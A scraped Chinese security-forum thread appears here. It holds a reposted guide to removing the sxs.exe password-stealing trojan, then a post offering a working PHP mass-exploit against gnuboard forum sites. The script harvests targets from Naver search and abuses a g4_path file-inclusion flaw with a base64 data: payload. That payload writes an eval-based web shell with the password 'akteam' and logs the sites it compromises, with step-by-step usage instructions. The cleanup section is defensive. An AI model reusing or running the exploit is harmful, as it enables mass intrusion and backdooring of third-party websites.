最近看过此主题的会员

返回列表 发帖

新人报道

如题………………
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:风华碧水发表,本帖发表者风华碧水符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者风华碧水和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

sxs.exe病毒专杀工具<br>前些天电脑中了“sxs.exe病毒”,后来整理了一篇“sxs.exe病毒手动删除方法”,没想到短短几天时间,通过搜索找过来的朋友就突破8000大关,此病毒发作之广可想而知。 <BR>杀毒软件方日前终于推出了针对此病毒的专杀工具,再遇到这个问题的朋友就无须自己动手了。 <BR>说明: <BR>引用 <BR>8月初出现了大量针对主流杀毒软件编写的恶性病毒。它们除了具有常见危害外,还会造成主流杀毒软件和个人防火墙无法打开,甚至导致杀毒时系统出现“蓝屏”、自动重启、死机等状况。 <BR>瑞星“橙色八月专用提取清除工具”专门针对此类病毒编写,可清除“QQ通行证(Trojan.PSW.QQPass)”、“传奇终结者(Trojan.PSW.Lmir)”、“密西木马(Trojan.psw.misc)”等病毒及其变种。没有安装瑞星杀毒软件的用户可免费下载使用。 <BR>注:建议您重新启动计算机,按住F8键,选择“安全模式”,进入后使用此工具杀毒。 <BR>附:病毒列表上的病毒主要针对以下安全软件 <BR>卡巴斯基 <BR>Symantec AntiVirus <BR>瑞星 <BR>江民杀毒软件 <BR>天网防火墙个人版 <BR>噬菌体 <BR>木马克星 <BR>金山毒霸 <BR>橙色八月专用提取清除工具下载地址: <BR>http://it.rising.com.cn/Channels/Service/2006-08/1154786729d36873.shtml <BR>&nbsp; <BR>*************************************** <BR>sxs.exe病毒手动删除方法&nbsp; <BR>有史以来第一次遭遇如此顽固的病毒,网上找了找,没有统一的名字,瑞星称为 Trojan.PSW.QQPass.pqb 病毒,我就叫它 sxs.exe病毒吧 <BR>重装系统后,双击分区盘又中了,郁闷,瑞星自动关闭无法打开,决定手动将其删除 <BR>现象:系统文件隐藏无法显示,双击盘符无反映,任务管理器发现 sxs.exe 或者 svohost.exe (与系统进程 svchost.exe 一字之差),杀毒软件实时监控自动关闭并无法打开 <BR>找了网上许多方法,无法有效删除,并且没有专杀工具 <BR>手动删除“sxs.exe病毒”方法: <BR>在以下整个过程中不得双击分区盘,需要打开时用鼠标右键——打开 <BR>一、关闭病毒进程 <BR>Ctrl + Alt + Del 任务管理器,在进程中查找 sxs 或 SVOHOST(不是SVCHOST,相差一个字母),有的话就将它结束掉 <BR>二、显示出被隐藏的系统文件 <BR>运行——regedit <BR>HKEY_LOCAL_MACHINE"Software"Microsoft"windows"CurrentVersion" <BR>explorer"Advanced"Folder"Hidden"SHOWALL, <BR>将CheckedValue键值修改为1 <BR>这里要注意,病毒会把本来有效的DWORD值CheckedValue删除掉,新建了一个无效的字符串值CheckedValue,并且把键值改为 0!我们将这个改为1是毫无作用的。(有部分病毒变种会直接把这个CheckedValue给删掉,只需和下面一样,自己再重新建一个就可以了) <BR>方法:删除此CheckedValue键值,单击右键 新建——Dword值——命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”。 <BR>在文件夹——工具——文件夹选项中将系统文件和隐藏文件设置为显示 <BR>三、删除病毒 <BR>在分区盘上单击鼠标右键——打开,看到每个盘跟目录下有 autorun.inf 和 sxs.exe 两个文件,将其删除。 <BR>四、删除病毒的自动运行项 <BR>打开注册表 运行——regedit <BR>HKEY_LOCAL_MACHINE&gt;SOFTWARE&gt;Microsoft&gt;Windows&gt;CurrentVersion&gt;Run <BR>下找到 SoundMam 键值,可能有两个,删除其中的键值为 C:WINDOWSsystem32SVOHOST.exe 的 <BR>最后到 C:WINDOWSsystem32" 目录下删除 SVOHOST.exe 或 sxs.exe <BR>重启电脑后,发现杀毒软件可以打开,分区盘双击可以打开了。 <BR>五、后续 <BR>杀毒软件实时监控可以打开,但开机无法自动运行 <BR>最简单的办法,执行杀毒软件的添加删除组件——修复,即可。 <BR>最近发现中毒的人比较多<BR>相关软件下载<BR>http://upload.programfan.com/upfile/200611280727787.rar<BR>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

韩国gnuboard论坛EXP及利用方法
1.本机搭建PHP环境2.将EXP程序保存为akt.php3.CMD下执行php akt.php4.产生的akt.txt中记录成功URL5.http://目标URL/data/hardison.php   密码:akteam   用PHP连接EXP:
<TABLE class=FCK__ShowTableBorders cellSpacing=0 cellPadding=0 width="80%">



复制代码


<?php
echo"   +----------------------------------------------------------------+
";
echo"                   http://bbs.honkwin.com
";
echo"   +----------------------------------------------------------------+
";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&amp;query=bbs/board.php&amp;xc=&amp;docid=0&amp;lang=all&amp;st=s&amp;fd=2&amp;start=".$c."&amp;display=10

&amp;&amp;qvt=0&amp;sm=tab_pge";
get($a,$b);

}
function get($host,$file)
{
           
             $fp = fsockopen($host, 80, $errno, $errstr, 10);
             if (!$fp) {
                 echo "SocketError: $errstr ($errno)
";
                 return false;
             }
             $get = "GET $file HTTP/1.1
";
             $get .= "Host: $host
";
             $get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
";
             $get .= "Referer: http://$host
";
             $get .= "Connection: Close
";
                         $get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME

";
             fwrite($fp, $get);
             $response=stream_get_contents($fp);
             preg_match_all("(http://[-w.]+(:d+)?(/([w/_.]*)?)?bbs/board.php)",$response,$put);
             for ($i=0;$i<count($put[0]);$i++)
                         {
                         $a=(int)$i*3;
                       
                       
                         fuck($put[0][$a]);
                         //echo count($put[0]);
                         //print_r($put[0]);
                         //fuck($put[0][$i]);
                       
                         break;
                       
                         }
                       
           
             fclose($fp);
                                               
}
function fuck($ok)
{
$a=preg_replace('(bbs/board.php)','',$ok);
$file=$a."common.php?g4_path=/tmp2345";
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL2hhcmRpc29uLnBocCcsJ3crJyksJzw/

cGhwIEBldmFsKCRfUE9TVFtob29lZHVdKTtlY2hvICJoYXJkaXNvbiBiaWcgYmlnICI7Pz4nKTs/Pg==";
$shell=$a."data/akteam.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&amp;&amp;eregi("(tmp)",$xx))
{
print $sitepath."     Vulnerability yes"."
";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\02345)",$xx))
{
print $sitepath."     ok"."
";
}
if (eregi("(akteam)",$oksehll))
{
print $shell." pass:akteam"."
";
$axx="
".$shell;
$sh=fopen('akt.txt',"a+");
fwrite($sh,$axx);
fclose($sh);
}

}
else
{
print $sitepath."     Vulnerability no"."
";
}
}

?> </TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表